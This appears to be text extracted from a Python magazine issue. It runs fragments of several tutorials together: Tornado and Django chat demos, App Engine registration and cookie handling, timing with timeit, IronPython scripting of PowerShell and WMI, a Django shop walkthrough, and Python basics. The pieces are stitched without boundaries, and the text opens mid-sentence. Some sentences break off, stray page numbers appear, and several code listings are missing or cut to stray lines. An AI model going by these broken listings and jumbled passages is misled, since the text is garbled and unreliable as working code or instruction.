commit/a1882138363ff684c11b427a37a067a75166cff1. Hopefully you're getting into the flow of editing the files,
running the app and loading it in your browser. I did, and I believe that a Git commit is worth a thousand words, so
here are 3 commits that built all the features for the web-based database email system:
https://github.com/mdagosta/hello-sdj/commit/3e5b0c5a4fb4beb3e2e968ee1a0e9ecb35bc0fc7
https://github.com/mdagosta/hello-sdj/commit/866c88b3d51724f5e1a8177ce56d66565dc3e8bb
https://github.com/mdagosta/hello-sdj/commit/b97230fbc08ea85c8c8730609f32c3befc097314
I hope that you are successful and your application works great. If you get it working, you'll send me an
email, and I'll respond to let you know that I got your message. Don't be shy :-)
Tornado example
For the Tornado example, I will walk you through installing Tornado so you can run the web chat demos
that come with the Tornado package. These examples are sufficient to illustrate the polling and websocket
implementations without any modifications needed. The first chat demo requires Google OAuth, so if you
aren't already part of the Google Borg you'll need to sign up for a Google account if you want to try it out.
Start by cloning Tornado from GitHub:
%> git clone https://github.com/facebook/tornado.git
%> cd tornado
%> sudo python setup.py install
Then copy the contents of the tornado/demos/chat directory to yours and run it:
%> cp -R tornado/demos/chat .
%> cd chat
%> ./chatdemo.py # Ctrl-C to exit
Use two separate browsers or profiles, visit http://localhost:8888, and sign into Google. Out of the box
you should be able to type messages that appear in the other browser.
Try the same thing using websockets. Go back up a directory and copy the contents of the tornado/demos/
websocket directory to yours:
%> cp -R tornado/demos/websocket .
%> cd websocket
%> ./chatdemo.py # Ctrl-C to exit
You will see some differences under the hood in the terminal where you ran the server. But otherwise
your messages should appear in both browsers as with the original chat demo. These code samples are
How to Choose
To choose between Django and Tornado, you should consider what kind of site you are trying to build, your
team's skill levels and proximity to each other, and how much effort you can afford to put into it. Django
will generally be better for beginners, since it abstracts away a lot of details, and for projects on a budget or
deadline. Tornado will generally allow more experienced developers to fulfill a larger vision, although it will
take more effort to build up some of the infrastructure.
If your team is distributed, Django provides better tools for managing schemas and migrating
data, whereas Tornado doesn't have anything like that built in. However, if your team is located in close
proximity, you can cultivate a culture of making something great from something small. Lastly, if your
application requires something like polling or web sockets, or needs to make web requests in order to
complete your own users' web requests, Tornado's IOLoop will offer you a lot of value. There are risks
associated with async systems, such as blocking the main thread, but when these are mitigated, asynchronous
systems bring a wider variety of dynamic and interactive features that are hard to accomplish with
standard forking web servers. If you have a highly skilled team working in close proximity, you will
almost certainly be able to pull off any vision using Tornado.
Summary
If you're starting a new project from scratch, I highly recommend Python. It's a great overall language with
enough clarity, speed and features that you can bring together a global team to build a high-performance
website. You'll want to choose a web framework that suits your team and project; between Django and
Tornado you can accomplish almost anything.
Before we go ahead and code the SignUp handler, we need some place to store our users' registration
details. On GAE we will be using the great Guido's ndb library to set up our models (Listing 2).
Listing 1. Possible user registration form markup
<h1> New User? Register Here! </h1><hr>
<form method="POST" action="/create_account">
  <label> username: <input type="text" name="username"></label> |
  <label> set a password: <input type="password" name="password"></label> |
  <button type="submit"> create my account</button>
</form>
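Listing 2 itself is not part of this excerpt; a minimal ndb model consistent with the form above might look like this (the field names are illustrative, not the article's actual code):

from google.appengine.ext import ndb

class User(ndb.Model):
    username = ndb.StringProperty(required=True)
    password_hash = ndb.StringProperty(required=True)
    created = ndb.DateTimeProperty(auto_now_add=True)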
We are using a similar approach to the one we used to protect our passwords: we store each cookie with a
hash of the cookie value, salted with a variable salt and a static salt.
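A minimal sketch of that idea; the salt values and the helper name are hypothetical, not the article's actual code:

import hashlib

STATIC_SALT = 'application-wide-secret'  # hypothetical value

def hash_cookie_value(value, variable_salt):
    # salted hash: per-user (variable) salt plus application-wide (static) salt
    return hashlib.sha256(value + variable_salt + STATIC_SALT).hexdigest()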
Logout functionality
Logout is simply clearing up the stored cookie (Listing 5).
Listing 5. Clearing up stored cookie
class LogoutHandler(webapp2.RequestHandler):
    def get(self):
        cookie_value = ''
        cookie = 'username=' + cookie_value + ';Path=/'
        self.response.headers.add_header('Set-Cookie', cookie)
        template = jinja_environment.get_template('home.html')
        variables = {'message': 'Successfully logged out.'}
        self.response.out.write(template.render(variables))
And now we implement our login_required decorator (Listing 7). As an example, say we want to add a
new page which should be login protected. We can implement it like this: Listing 8.
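Listings 7 and 8 are not reproduced in this excerpt; a minimal sketch of such a decorator, with check_secure_cookie as a hypothetical helper standing in for the hash validation described above, might look like this:

def login_required(handler_method):
    def wrapper(self, *args, **kwargs):
        # allow the request only if a valid, signed cookie is present
        cookie = self.request.cookies.get('username')
        if cookie and check_secure_cookie(cookie):
            return handler_method(self, *args, **kwargs)
        self.redirect('/login')
    return wrapper

class SecretPageHandler(webapp2.RequestHandler):
    @login_required
    def get(self):
        self.response.out.write('Members only!')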
Simple timing
The most intuitive way to measure code execution time in any programming language is the same
method that we would use with any real-life action: take the time before the action has started, take it
again after it's finished, and subtract the two to find the duration.
In Python, the current timestamp (in seconds) can be retrieved using time.time(). Here's a simple example
that times the creation of a comma-delimited string of 100,000 numbers:
import time

start = time.time()
lst = [str(i) for i in range(100000)]
res = ','.join(lst)
end = time.time()

print 'Execution took %.3fs' % (end - start)
The last line of this script will output the time it took for the loop to be executed.
If you run this example multiple times, you'll notice the results vary slightly. Why is that?
Every process that runs on your system depends on physical resources like CPU and memory, which are
shared between all running processes. Since you have other processes running, from your browser to
your operating system, the script might need to wait for one or more resources to become available and
might take a (tiny) bit longer.
Using timeit
The most straightforward approach for minimizing the deviation is to run the same script many times and check
the average execution time. The more times the script is run, the more accurate the timing. Fortunately,
Python has a built-in solution to help us out: a module called timeit, which provides a simple way to time small
bits of Python code. Rewriting our previous example with timeit:
from timeit import timeit

times = 20
total = timeit(stmt="lst = [str(i) for i in range(100000)]; res = ','.join(lst)",
               number=times)
print 'Average execution took %.3fs' % (total / times)
In the above example, we measure how much time it takes to execute our code, given as a string, using
timeit. The code will be executed number times; number defaults to 1,000,000 (20 in our example).
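For what it's worth, the same module also provides repeat(), which runs the whole measurement several times so you can take the best (least-disturbed) result:

from timeit import repeat

# three independent measurements of 20 executions each
results = repeat(stmt="lst = [str(i) for i in range(100000)]; res = ','.join(lst)",
                 repeat=3, number=20)
# min(results) is the least-disturbed total; divide by 20 for per-execution time
print 'Best of 3: %.3fs' % (min(results) / 20)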
Conclusion
With Python's timeit, timing code execution is very simple. I think it's a great tool that every Python
developer should use when trying to optimize performance and experiment with different approaches to the
same problem.
Installing IronPython
Just visit the IronPython website and download either the zip file or the installer. (If you want to follow the
basic examples in a Linux or Mac OS X environment, you can also run IronPython on Mono: simply put the
mono executable in front of any ipy.exe call.)
To test your installation, write the following hello-world script and save it as hello_iron_python.py: Listing 1.
Listing 1. Hello world in IronPython
print 'Hello IronPython.'
You can run it by passing it as an argument to the ipy.exe executable that was part of the IronPython installation:
ipy.exe hello_iron_python.py
# mono ipy.exe hello_iron_python.py
[Out] Hello IronPython.
If this prints the string Hello IronPython. you are set up and ready to go.
Another nice use of the ipy interpreter is calling it without any arguments: this starts the Python REPL, a
very useful tool to explore and experiment with code. It can also be used to introspect .NET objects with the
Python function dir(<object>), which returns all properties and methods defined on the object.
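For example, at the REPL:

>>> from System import DateTime
>>> dir(DateTime)   # lists the properties and methods of the .NET type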
Now that the basics are working, it is time to use IronPython in conjunction with other parts of the .NET framework.
Apart from moving files, most automation tasks on Windows require the use of either WMI or Powershell to
obtain required information or perform necessary actions. (As long as you do not need to access information
about Windows-specific parts, it is actually possible to use IronPython as a replacement for CPython by
utilizing standard library modules like os, sys and others. With a little attention this will keep your script
portable between IronPython and CPython.)
To demonstrate the interaction between IronPython and Powershell (the emerging standard for Windows
administration), the following example will obtain information about currently running processes and output the
acquired information to the console. The information is obtained by calling the Powershell Get-Process cmdlet.
First we need to be able to access Powershell from IronPython; as Powershell runs on the .NET framework, we
can use it after the following steps:
add a reference to System.Management.Automation,
import RunspaceInvoke,
create a runspace and call Invoke() on it with the cmdlet we need.
The surviving fragment of the original listing manages the runspace's lifetime inside a generator, context-manager style:
runspace = RunspaceInvoke()
yield runspace
runspace.Dispose()
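Putting those pieces together, a minimal self-contained sketch (the context-manager wrapper is an assumption based on the yield in the fragment above, not the article's exact listing) could look like this:

import clr
clr.AddReference('System.Management.Automation')

from contextlib import contextmanager
from System.Management.Automation import RunspaceInvoke

@contextmanager
def powershell():
    runspace = RunspaceInvoke()
    yield runspace
    runspace.Dispose()

with powershell() as shell:
    # Invoke() runs a cmdlet and returns a collection of PSObjects
    for ps_object in shell.Invoke('Get-Process'):
        process = ps_object.BaseObject  # unwrap the underlying Process object
        print process.ProcessName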
When running a cmdlet, it returns PSObjects. These objects are a wrapper around the actual objects that are
normally needed, which are accessible via the BaseObject property.
Now on to obtaining a list of all running processes, sorted according to the memory used per process (just add
the code to the same file you put the Powershell snippet in): Listing 4.
As is easy to see, IronPython even maps methods like getattr to the equivalent methods on the .NET
objects.
However, anyone who has worked with the Get-Process cmdlet has probably realized that the obtained
information is somewhat limited and some properties seem to be missing. A prominent example of one
such missing property is the CommandLine that started the process: this can be useful if you start multiple
scripts and only want to kill one script that you can identify by its command-line arguments.
To obtain information about the CommandLine it is necessary to use WMI. To query WMI (using the Windows
Query Language, WQL), you have to reference the System.Management assembly and use either a
ManagementObject or a ManagementObjectSearcher to perform the queries:
the ManagementObject can only return one management object,
the ManagementObjectSearcher can return a collection of management objects that can be accessed by calling
Get() on the result of the query (Listing 6).
Listing 6. Using WMI via WQL
import clr
clr.AddReference('System.Management')
from System.Management import ManagementObjectSearcher

query = 'SELECT * FROM Win32_Process'
query_result = ManagementObjectSearcher(query)
wmi_processes = query_result.Get()

enumerator = wmi_processes.GetEnumerator()
if enumerator.MoveNext():
    process = enumerator.Current
    for prop in process.Properties:
        print '%s %s' % (prop.Name, prop.Value)

for process in wmi_processes:
    if 'ipy' in process['Name']:
        if 'sleep' in process['CommandLine']:
            print 'Found evil process: will delete it!'
            process.Delete()
As soon as you know the property that you need (using the REPL to find it is a good idea), you can access it
via object[<property>] instead of iterating over and printing all properties. This is shown at the end of the script,
where we destroy the sleeping script as soon as we find it, and not the ipy process that runs the termination
script (just make sure that you started the sleep script in another shell).
In conjunction with basic Python modules like os, sys and glob, this should be enough information to get
started scripting Windows using IronPython.
using System;
using System.IO;
using IronPython.Hosting;
using Microsoft.Scripting;
using Microsoft.Scripting.Hosting;
After compiling this class and running it in the same folder where you put the hello_iron_python.py script, you
should see the same output as before. (In my examples I use Mono to compile and run, as I use a Linux machine
at home; it should be possible to execute these steps with the same calls to Microsoft's csc.exe compiler.)
mono-csc /reference:IronPython.dll /reference:Microsoft.Scripting.dll csharp_hosting.cs
mono csharp_hosting.exe
[Out] Hello IronPython.
    return x + y

# Obtain the name variable from the scope
param = name
hello_there(name)

# Write something into the scope
out_param = 'Hi C#'

using System;
using System.IO;
using IronPython.Hosting;
using Microsoft.Scripting;
using Microsoft.Scripting.Hosting;
Compiling and running the new and improved engine will produce the following output: Listing 10.
Listing 10. Output of the new engine
Hello, Reader!
Read a parameter back: Hi C#
Sum of 3 and 4 (by Python): 7
This should provide a short introduction to using IronPython as an embedded scripting language.
For a complete list of these mapping peculiarities and how they are handled, it is best to check the official
IronPython documentation.
Summary
This article showed you how to set up IronPython and take your first steps with the language on the .NET framework. Moreover, it explained how to integrate some essential tools, like Powershell and WMI, that you might need when using it to script Windows.
Furthermore, it explained how to use IronPython to extend your application with scripting abilities in a few lines of code.
If you want more information about IronPython, either look at the official documentation or reach for a book about the topic: IronPython in Action remains a very good reference, even though it was already released in 2009.
On the Web
Glossary
CLR
The Common Language Runtime: the environment all .NET languages run on.
CPython
Normally just called Python: the official reference implementation of the Python programming language.
DLR
The Dynamic Language Runtime: a layer for dynamic languages built on top of the CLR.
IronPython
An implementation of the Python programming language that runs on the Common Language Runtime (CLR).
Mono
An open source implementation of the .NET framework available for Linux, Mac OS X, Solaris and Windows.
REPL
The read-eval-print loop: an interactive shell often used by dynamic languages to allow rapid exploration and prototyping.
WMI
Microsoft's Windows implementation of the Web-Based Enterprise Management (WBEM) and Common Information Model (CIM) standards.
WQL
Query language used to obtain information about the system from WMI.
Listing 8. Mail server for debugging (prints mails to stdout). Example for port 1025
$ python -m smtpd -n -c DebuggingServer localhost:1025
These are just a few from the long list of techniques that Python provides to its programmers, but the availability of these idioms makes Python interesting and quick to code in without giving up on the readability of the code.
Django is a high-level Python Web Framework that encourages rapid development and clean,
pragmatic design.
djangoproject.com
Based on the philosophy of DRY (Don't Repeat Yourself), Django is a little bit different from other MVC frameworks: views are called templates and controllers are called views, which makes Django an MTV framework. It may not seem like much of a difference, but talk is cheap: show me the code!
Suppose that a local market in your town, the D-buy, knew that you're a developer and hired you to develop an e-commerce site for some of their products. You, as a Python developer, took the job and started to develop your solution.
If you don't have Django installed on your machine, you can install it via pip. For this tutorial we're going to use version 1.5.1.
$ pip install Django==1.5.1
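With Django installed, create the project skeleton (in Django 1.5 the bundled script is called django-admin.py):

$ django-admin.py startproject dbuy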
As you can see, a folder named dbuy was created in your current directory. Get into it and look at the files created.
$ ls
dbuy
$ cd dbuy
$ tree
.
├── dbuy
│   ├── __init__.py
│   ├── settings.py
│   ├── urls.py
│   └── wsgi.py
└── manage.py

1 directory, 5 files
manage.py
A command-line utility that lets you run commands against your Django project.
dbuy/settings.py
Settings and configuration for this Django project.
dbuy/urls.py
The URL declarations (routes) for this Django project.
dbuy/wsgi.py
An entry point for WSGI-compatible web servers to serve your project.
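Now start the development server from the project folder:

$ python manage.py runserver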
If you then visit http://localhost:8000/ in your browser you should see a welcome screen.
This is the Django development server, a web server written in Python. Note that this server is not meant to be used to run your applications in production; it's just there to speed up your development.
Initial setup
Open dbuy/settings.py. It's a Python file that holds the Django settings. You'll see database, timezone, admins, static and template configs. First we're going to set up the database. You'll see a dict like the one in Listing 1.
Listing 1. A longer piece of Python code
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.',  # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': '',                       # Or path to database file if using sqlite3.
        # The following settings are not used with sqlite3:
        'USER': '',
        'PASSWORD': '',
        'HOST': '',                       # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
        'PORT': '',                       # Set to empty string for default.
    }
}
You can set up more than one database, but for this tutorial we're just using one, the default. The keys represent the settings of a database.
ENGINE: which database backend you'll use. Django officially supports PostgreSQL, MySQL, Oracle and SQLite3. We're going to use sqlite3.
NAME: your database name. In our case, the name of the file.
Take a look at the INSTALLED_APPS setting: a tuple listing all the Django applications that are activated in your project. Django already ships with some apps included by default; you can install other apps, made by others or by yourself, and you can also create your own pluggable apps, package them, and distribute them to other developers.
With the database configured, let's create our tables. At your shell, type:
$ python manage.py syncdb
This command reads all the INSTALLED_APPS and creates any necessary tables in your database.
Creating your apps
You're developing an e-commerce site, so what should you have? You'll just have a list of products, which can be grouped by categories and can be bought by a customer. So let's start implementing the products. In your shell, type the following command.
$ python manage.py startapp products
database.db
dbuy
    __init__.py
    settings.py
    urls.py
    wsgi.py
manage.py
products
    __init__.py
    models.py
    tests.py
    views.py
A Django app is a Python package, with some files, that follows some conventions. You could create the folder and the files by yourself, but the startapp command eases your life. The next step is to write your models to define your database. Our products will have a name, photo, description, price and categories; the categories will be picked from a fixed list of choices.
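The models listing is not reproduced here; a minimal sketch of what products/models.py could look like, given the fields discussed below, is (field lengths and the exact choice values are assumptions):

from django.db import models

# hypothetical choice list: first item is stored, second is human-readable
CATEGORY_CHOICES = (
    ('games', 'Games'),
    ('clothes', 'Clothes'),
)

class Product(models.Model):
    name = models.CharField(max_length=100)
    photo = models.ImageField(upload_to='products', blank=True, null=True)
    description = models.TextField(blank=True)
    price = models.DecimalField(max_digits=8, decimal_places=2)
    categories = models.CharField(max_length=20, choices=CATEGORY_CHOICES)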
In Django, a model is represented by a class that inherits from django.db.models.Model. The class variables represent the fields of the table created by the ORM; each field is represented by an instance of a Field class. By default all these fields are required; if you want an optional field, you have to say so explicitly by using the parameters blank and null.
Some fields, like DateTimeField, when blank (not required) must also be null: if you set just blank and don't submit a value for the field, it will raise an IntegrityError, because blank is allowed but null is not. You should avoid using null=True on string-based fields, because doing so allows two possible values for "no data": NULL and the empty string.
Some fields have required arguments, e.g. max_length in CharField, max_digits in DecimalField and upload_to in ImageField. We'll talk about these later. As you can see, we used the choices parameter on the categories. The (optional) choices parameter must receive an iterable of iterables of exactly 2 items (e.g. [('A', 'B'), ('C', 'D')]). The first item is the value that will be stored in the database; the second one is meant for humans.
What you just wrote gives you a lot: through the ORM, this class describes your database table and gives you access to it, but you need to activate the app first. In dbuy/settings.py, add your app to the INSTALLED_APPS tuple (Listing 4).
    'products',
    # Uncomment the next line to enable the admin:
    # 'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
Run python manage.py syncdb again and you'll see that your product table was created. Now let's play a little bit with the database.
We're going to use the Python shell through manage.py; that way the Django environment is loaded automatically in your shell.
$ python manage.py shell
>>> from products.models import Product
>>> Product.objects.all()
[]
# No product was created yet.
>>> p = Product(name='Pacman', description='some description', price=12.99, categories='games')
# You just created your product
>>> p.save()
# Now it is in the database
>>> p.id
1
>>> Product.objects.all()
[<Product: Product object>]
But this representation isn't the best one. You can define on your model a better way to represent your products:
class Product(models.Model):
    ...
    def __unicode__(self):
        return self.name
Let's deal with these objects in a nicer way than the command line. Django already comes with an admin interface that eases your development a lot. You just need to uncomment a few lines and the admin is enabled! In your dbuy/urls.py uncomment the following lines:
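In the default Django 1.5 urls.py those commented-out lines look like this:

from django.conf.urls import patterns, include, url

# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()

urlpatterns = patterns('',
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
)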
And in your dbuy/settings.py, uncomment django.contrib.admin in your INSTALLED_APPS. Just run the syncdb command again and you've created a whole admin site, ready to manage your data. Let's see what we have.
You can log in with the username and password that you created in the first syncdb.
Let's register our model in the admin. I like to create a file admin.py for each one of my apps and register the models of the app there. For the products app it should look like this:
from django.contrib import admin
from products.models import Product
admin.site.register(Product)
Now you'll be able to edit your products. The Django admin is a powerful tool and you can personalize it; read the admin docs (https://docs.djangoproject.com/en/1.5/ref/contrib/admin/) to fit the admin to your needs. We're now ready to put something on our home page, at least a list of our products.
Writing your first views
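The view listing is not reproduced here; given the description below, the first version of products/views.py probably looked something like this (template loading done by hand):

from django.http import HttpResponse
from django.template import loader, Context

from products.models import Product

def index(request):
    products = Product.objects.all()
    template = loader.get_template('index.html')
    context = Context({'products': products})
    return HttpResponse(template.render(context))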
You just created the index view. It receives an HTTP request and returns a response, but by itself it doesn't do anything; you have to set up the URLs that point to the view. In your dbuy/urls.py add the following line:
url(r'^$', 'products.views.index', name='index'),
This will get all your products and render the template. When the render function finds a template variable products, it will associate it with the Python variable. But for this code to work you have to write your templates.
In settings.py, find the variable TEMPLATE_DIRS and add the path to your template dir. It's highly recommended that you don't hardcode it: most of the time you're reading someone else's code, so you need a configuration that works on any OS (Listing 6).
Listing 6. A longer piece of Python code
from os.path import abspath, dirname, join

PROJECT_ROOT = dirname(abspath(__file__))

TEMPLATE_DIRS = (
    join(PROJECT_ROOT, 'templates'),
)
(Rendered index page: each product is listed with its description and category, e.g. "some description / games", followed by a contact footer: "For more information please send an e-mail to email@domain.com.")
Ok, nice! But let's use a shortcut function to return the HttpResponse object. Refactoring our view (Listing 8):
Listing 8. A longer piece of Python code
from django.shortcuts import render

from products.models import Product

def index(request):
    products = Product.objects.all()
    return render(request, 'index.html', {'products': products})
Better! The render function does the exact same thing as those lines of code: it receives an HttpRequest, renders the template with the context variables and returns an HttpResponse.
For now, you have delivered a simple page. Next you will learn to deal with media and static files and use some of the power inside Django.
Note: these static and media configs are only for development; when you deploy your application you have to serve your static files from another server, not via Django.
What are you saying by doing that? You shouldn't deploy your Django application with DEBUG = True, for obvious reasons, so if the DEBUG variable is True it means you're in development mode and Django will serve the static files. The static function does this verification.
Now write the url that will handle the request:
url(r'^product/(?P<product_id>\d+)$', 'products.views.product', name='product'),
A url is a regular expression; that way you can specify the type of your url parameters easily. If you don't know regular expressions, you should read the Python documentation [2] about them. All you need to know here is that the url has the pattern /product/product_id, where product_id is an integer and the name of the view parameter.
def product(request, product_id):
    product = Product.objects.get(id=product_id)
    return render(request, 'product.html', {'product': product})
The view product received the product_id, made a query to the database, and rendered the template with the
product variable in the context. Now the html: Listing 1.
Listing 1. A longer piece of HTML code
<html>
  <head>
    <title> D-Buy </title>
  </head>
  <body>
    <h1> {{ product.name }} </h1>
    {% if product.photo %}
      <img src="{{ MEDIA_URL }}{{ product.photo }}" />
    {% endif %}
    <ul>
As the product photo is not required, you have to check whether there is a photo before rendering it. The {{ MEDIA_URL }} tag comes from settings.py. Run the server, access the url http://localhost:8000/product/1 and you'll see something like that. A little adjustment on the index (Listing 2). Or you can just use the url template tag and the url name:
<h3><a href="{% url 'product' product.id %}">{{ product.name }}</a></h3>
Now you have to sell the products, and for that the customers need an account. Use the startapp command to create the app profiles; in your profiles/models.py (Listing 3):
Listing 3. A longer piece of Python code
from django.db import models
from django.contrib.auth.models import AbstractUser

class Customer(AbstractUser):
    birth_date = models.DateField(u'Birth date', null=True, blank=True)
Add your app to INSTALLED_APPS, then create a file profiles/admin.py and register your new user model.
from django.contrib import admin
from profiles.models import Customer
admin.site.register(Customer)
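For Django 1.5 to actually use the custom user model, it must also be declared in dbuy/settings.py:

AUTH_USER_MODEL = 'profiles.Customer'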
That way, you're telling the authentication system to use your user model instead of the standard one. Basically the new user does the same thing as the old one (django.contrib.auth.models.User) but adds a field, birth_date, to the registration. Now run the syncdb command; it will delete your old user and create a new one. On another occasion you will learn a way to migrate your data. But the user will need a login page.
Django has its own login and logout system built in, but first let's talk a little bit about forms! IMHO, Django forms are one of the best things about the framework: they give you the HTML rendering, the validation and the errors in a few lines of code. Let's do some magic here; on another occasion we'll talk about Django forms in depth.
At profiles/views.py (Listing 4)
You can define a base template, base.html, and create a block; on all other templates you put the content inside this block and the Django template inheritance tags will do the rest of the work. Refactoring our templates, as in the sketch below:
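A minimal sketch of such a pair of templates (the block name is an assumption):

<!-- base.html -->
<html>
  <head><title>D-Buy</title></head>
  <body>
    {% block content %}{% endblock %}
  </body>
</html>

<!-- index.html -->
{% extends "base.html" %}
{% block content %}
  <h1>Products</h1>
{% endblock %}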
Now, to finish, let's put some style in our code! For this example let's use Twitter Bootstrap. Download it at getbootstrap.com, unzip it and put it into a folder dbuy/static/. You can use the STATIC_URL variable to make the necessary changes.
STATIC_URL = '/static/'

STATICFILES_DIRS = (
    join(PROJECT_ROOT, 'static'),
)
Doing this you're telling Django to look for static files in the dbuy/static/ directory. In the templates, you then just need to add the path to the css or js files.
References
Philosophy of Python
by Douglas Camata
In this article I will present the basics of the Python programming language, from its history to some code, not forgetting to show you who is using it and to convince you to use it too.
The Python language began in the late 1980s, when it was conceived. Guido van Rossum, its creator and principal author, started the implementation in December 1989 at CWI. Guido makes all the decisions about the direction of Python and, because of that, he is called by the community the Benevolent Dictator for Life.
Python uses dynamic typing. In other words, you won't need to tell Python the types of your variables: it will figure them out by itself! You won't even need to declare them before use. You can see that working in Figure 2.
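Figure 2 is not reproduced here; an interpreter session along these lines shows the idea:

>>> x = 42          # x holds an int; no declaration needed
>>> x = "hello"     # the same name can now hold a str
>>> type(x)
<type 'str'>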
186
Although it uses dynamic typing, it is strongly typed. That means Python won't let you do some operations on two variables of different types, unlike JavaScript (where you can add a number to a string, for example), unless you teach it how to, or do a typecast from one type to the other.
See Figure 3. Please note that Python doesn't need anything at the end of a line: you will never forget a semicolon again!
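In the spirit of Figure 3, the interpreter makes the point:

>>> 1 + "2"
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unsupported operand type(s) for +: 'int' and 'str'
>>> 1 + int("2")    # an explicit typecast works
3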
Python's philosophy is based on the so-called Zen of Python. This is its content (Listing 1):
Listing 1. The Zen of Python
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
Python's philosophy cares more about the code itself, its beauty and good readability, than about performance. You should think about your case and know what is more important for you. There are many ways to tune the performance of beautiful code without making it ugly.
One more important thing to note: everything in Python is a reference. In other words, pretty much everything behaves like a C pointer. If you have a mutable object (a list, say) named my_var in your code, pass it to a function and modify it inside the function, the change will be visible through my_var outside the function too.
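A small sketch of both sides of this behavior (mutation is shared, rebinding is not):

def mutate(lst):
    lst.append(4)   # modifies the shared list object

def rebind(lst):
    lst = [0]       # only rebinds the local name; the caller is unaffected

my_var = [1, 2, 3]
mutate(my_var)
print my_var   # [1, 2, 3, 4]
rebind(my_var)
print my_var   # still [1, 2, 3, 4]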
Figure 5. Basic tuple and array use and proof that tuples are immutable
There are many functions for working with lists. If you are familiar with functional languages, you can map and reduce in Python too! And just to make things better, you can use list comprehensions to generate an entire new list while iterating over another. See Figures 6, 7 and 8 for some examples of these wonderful functions.
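In the spirit of those figures, a quick interpreter session:

>>> nums = [1, 2, 3, 4]
>>> map(lambda x: x * 2, nums)            # apply a function to every element
[2, 4, 6, 8]
>>> reduce(lambda acc, x: acc + x, nums)  # fold the list into one value
10
>>> [x * 2 for x in nums if x % 2 == 0]   # list comprehension
[4, 8]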
Dictionaries are wonderful data structures too. They provide, as the name says, key-value storage. You can initialize them with braces and, in doing so, set some initial key-value pairs. Access to values, addition of values, and dictionary initialization are shown in Figure 9. Remember that dictionary values may be any kind of object, and keys may be any hashable (immutable) object.
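Along the lines of Figure 9:

>>> ages = {'Donald': 80, 'Daffy': 76}   # initialization with braces
>>> ages['Donald']                       # access by key
80
>>> ages['Scrooge'] = 67                 # adding a new key-value pair
>>> len(ages)
3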
Functions
Functions can be defined using the def keyword and they can receive a finite number of arguments (including zero), a list of arguments, or a dictionary of keyword arguments. See Figure 10 for an example of a simple function which sums two arguments. Note that there's no verification of types or anything like it: all the error handling regarding the argument types is the user's responsibility.
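A sketch of the Figure 10 example:

def add(a, b):
    return a + b

print add(3, 4)          # 7
print add('py', 'thon')  # 'python'; no type checking is performed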
They can even be assigned to a variable. Let's say that you want to (don't try to think why) temporarily replace some built-in function. You can assign the actual function to a variable, then replace the built-in with your own function, and put the original function back when you're done. See Figure 11 for an example. Believe me, someday this will save you.
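A sketch of the Figure 11 trick, using len:

original_len = len     # keep a reference to the built-in

def fake_len(obj):
    return 42

len = fake_len         # shadow the built-in in this module
print len([1, 2, 3])   # 42
len = original_len     # put the original back
print len([1, 2, 3])   # 3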
Object Orientation
Object orientation is pretty straightforward in Python. You can define your own classes and inherit from built-in classes, but you can't modify built-in classes. The only thing that's hard to understand in Python's object orientation is self, but you don't really need to understand why it's there (it's complicated); just accept its existence and don't ever forget it.
Let's create a simple Duck class with a talk method, create an instance and make it talk. See Figure 12 for the implementation.
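A sketch of the Figure 12 implementation:

class Duck(object):
    def talk(self):
        print "Quack!"

donald = Duck()   # create an instance
donald.talk()     # Quack!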
That's how you create class instances in Python. Note the self argument in the talk method: if you don't put it there, you will get an argument error when trying to run the method. Now let's add a parameter to our Duck class and give a name to the duck. This can be done by implementing a method named __init__ inside the Duck class. In Python you will find many methods surrounded by underscores. They're called magic methods and each has its purpose; the __init__ method is called when creating an instance of your class. So we will add a name parameter there and set the object's name attribute to its value. Figure 13 shows the implementation.
By using self.name = name, we're setting an attribute on our object. As Figure 13 shows, you can now access the duck's name using the attribute. If we didn't use self there, the name variable would only be accessible inside the __init__ method.
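A sketch of the Figure 13 version:

class Duck(object):
    def __init__(self, name):
        self.name = name   # store the name on the instance

    def talk(self):
        print "Quack! I am %s" % self.name

donald = Duck("Donald")
print donald.name   # Donald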
Figure 14. A Nest class for your Duck class that responds in a particular way to the len function
When len is called on a Nest instance it will, under the hood, call the magic method __len__. It's really magical! Now let's overload the sum operator of the Nest class to accept new ducks, and only instances of the Duck class. Figure 15 holds the implementation.
Obviously the magic method needs the other object as an argument to overload the sum operator; that's why it's there. Then we used the isinstance built-in function to check whether the object we're trying to sum with the Nest is an instance of the Duck class. If it is, we add the duck to the duck list; otherwise we should do something about it, like raising an error. We will see more about error raising and handling in the next topic, and a sketch follows below.
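A sketch of what Figures 14, 15 and 19 together build up to:

class Nest(object):
    def __init__(self):
        self.ducks = []

    def __len__(self):          # called by len(nest)
        return len(self.ducks)

    def __add__(self, other):   # called by nest + other
        if isinstance(other, Duck):
            self.ducks.append(other)
        else:
            raise TypeError("only ducks can live in a nest")
        return self

nest = Nest()
nest = nest + Duck("Donald")
print len(nest)   # 1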
Isn't that code in Figure 16 beautiful? Now let's pretend that our code may raise many exceptions and we want to handle a specific one. 1 + 'a' would raise a TypeError (go on and try it in the interactive interpreter yourself), so we modify our code to handle only that kind of exception. Give Figure 17 a look.
This way, if the code block raises any exception that is not a TypeError, the interpreter will stop and you will see the stacktrace on your screen. Feel free to add anything before the 1 + 'a' line that would raise a different exception, like 1/0, and see.
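In the spirit of Figure 17:

try:
    1 + 'a'
except TypeError:
    print "you cannot add an int and a string"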
You can chain many excepts in a try...except block to handle each different exception in its own way, and have a default handler for when an unknown exception is raised. You can even handle many errors in the same way by using a tuple of errors instead of just one; Figure 18 shows that, and a sketch follows. Let's check something: what do you think is wrong with Figure 18's code? If an unpredicted exception is raised, the code below may not work as expected. So try to always know the class of the exception you're trying to handle.
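A sketch in the spirit of Figure 18 (do_something is a hypothetical stand-in for the risky code):

try:
    do_something()
except (TypeError, ValueError):   # handle two error classes the same way
    print "bad input"
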